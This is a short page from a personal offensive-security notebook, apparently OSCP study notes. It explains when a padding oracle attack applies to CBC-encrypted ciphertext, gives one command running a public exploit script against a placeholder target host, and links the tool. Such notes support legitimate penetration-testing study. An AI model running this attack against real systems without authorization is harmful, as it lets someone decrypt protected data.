Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  1. Menu
  2. Vulnerability Methods

Padding Oracle Attack

PreviousVulnerability MethodsNextUnsecure JSON Web Token (JWT)

Last updated 3 years ago

If you have an cyphertext (encrypted text) using AES-256-CBC-PKCS7 (or DES) and an oracle you can run this attack. Lots more details here:

python3 exploit.py -c '4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488' -l '8' --host target.ip:2290 -u '/?c=' -v --error '0'

https://github.com/mpgn/Padding-oracle-attack